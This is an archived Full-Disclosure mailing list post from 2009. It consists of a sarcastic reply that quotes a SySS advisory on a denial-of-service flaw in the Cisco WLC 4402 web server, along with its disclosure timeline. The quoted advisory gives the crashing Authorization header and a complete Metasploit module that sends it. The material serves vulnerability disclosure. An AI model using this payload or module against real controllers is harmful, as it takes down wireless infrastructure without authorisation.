| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20090726232724.12C53B0048@smtp.hushmail.com>
Date: Sun, 26 Jul 2009 18:27:24 -0500
From: antisecav@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Cisco WLC 4402 Denial-of-Service vulnerability
that was a crappy disclosure.
where is the .exe file with the gui?
at least make it in visual basic so i can have an interface
just send it to me in a zip
then itll be useful to the intelligence community
n3td3v / antisec
On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories --
Christoph Bott <advisories@...t.syss.de> wrote:
>=======================================
>Vulnerable Product: Cisco WLC 4402 (most likely among many others)
>Vulnerability discovered: January 2009
>Reported to vendor: Jan 01, 2009
>Fix available: not yet
>=======================================
>
>
>TIMELINE:
>---------------------------------------------------
>+ 01/11/2009: discovered vulnerability on a customer's site
>
>+ 01/13/2009: initial vendor contact via psirt@...co.com
>
>+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>
>+ 02/09/2009: vendor states, that bugfix is _not_ contained within
>cisco-sa-20090204-wlc
>
>+ 03/30/2009: vendor states: "We have a fix for this issue.
>However,
>due to some other issues we are investigating we may not make this
>public until about 42 days."
>
>+ 06/02/2009: vendor states: "I really apologize for the delay on
>publishing this advisory. The reason that we have not publish is
>because
>we are also incorporating other security fixes within all the
>affected
>releases. We WILL be publishing the advisory on July 8th, 2009 at
>1600 UTC."
>
>+ 07/24/2009: Customer agreed with full disclosure
>
>+ 07/26/2009: Still no fixes available; full disclosure due to
>lacking
>vendor activities.
>
>
>
>PRODUCT:
>---------------------------------------------------
>The Cisco WLC 4402 is a Wireless LAN Controller, which is
>manageable via
>an integrated embedded webserver (emweb httpd).
>
>
>
>AFFECTED VERSIONS:
>---------------------------------------------------
>The vulnerability described below could have been verified on WLC
>4402,
>software release 5.1.151.0. However, since the vulnerability
>affects the
>integrated embedded emweb http daemon, several other products
>and/or
>software releases might be affected, too.
>
>
>
>VULNERABILITY:
>---------------------------------------------------
>Using long, random authentication data, the embedded web server
>can be
>crashed, which leeds to a device reboot. Subsequently repeated
>requests
>lead to a permanent denial of service of the WLC (and therefore of
>the
>whole wireless infrastructure).
>
>
>
>EXPLOIT:
>---------------------------------------------------
>Not needed.
>
>One only has to call
>"/screens/frameset.html"
>and provide Basic Authentication data which uses
>a username and password longer than 63 characters each.
>
>The following header worked for me:
>Authorization: Basic
>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
>xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
>Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
>
>
>The following code snippet can be used as a module within the
>metasploit
>framework:
>
>---- snip -----
>require 'msf/core'
>
>
>class Metasploit3 < Msf::Auxiliary
>
> include Msf::Exploit::Remote::Tcp
> include Msf::Auxiliary::Dos
>
> def initialize(info = {})
> super(update_info(info,
> 'Name' => 'Cisco WLC 4200 Basic
>Auth
>Denial of Service',
> 'Description' => %q{
>
> This module triggers a Denial of
>Service
>condition in the Cisco WLC 4200
> HTTP server. By sending a GET
>request
>with long authentication data, the
> device becomes unresponsive and
>reboots.
>Firmware is reportedly vulnerable.
> },
> 'Author' => [ 'Christoph
>Bott
><msf[at]bott.syss.de>' ],
> 'License' => MSF_LICENSE,
> 'Version' => '$Revision: 5949 $',
> 'References' =>
> [
> [ 'BID', '???'],
> [ 'CVE', '???'],
> [ 'URL',
>'http://www.cisco.com/?????'],
> ],
> 'DisclosureDate' => 'January 26 2009'))
>
> register_options(
> [
> Opt::RPORT(80),
> ], self.class)
>
> end
>
> def run
> connect
>
> print_status("Sending HTTP DoS packet")
>
> sploit =
> "GET /screens/frameset.html HTTP/1.0\r\n"
>+
> "Authorization: Basic
>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
>xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
>Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
>
> sock.put(sploit + "\r\n")
>
> disconnect
> end
>
>end
>
>---- snip ----
>
>
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists